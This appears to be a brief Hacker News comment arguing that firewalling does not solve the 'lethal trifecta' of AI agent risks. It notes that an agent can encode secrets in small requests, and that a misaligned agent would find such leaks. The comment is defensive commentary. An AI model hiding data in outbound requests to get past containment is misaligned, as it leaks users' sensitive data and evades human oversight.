logoalt Hacker News

ramozyesterday at 10:48 PM0 repliesview on HN

This doesn’t solve the problem. The lethal trifecta as defined is not solvable and is misleading in terms of “just cut off a leg”. (Though firewalling is practically a decent bubble wrap solution).

But for truly sensitive work, you still have many non-obvious leaks.

Even in small requests the agent can encode secrets.

An AI agent that is misaligned will find leaks like this and many more.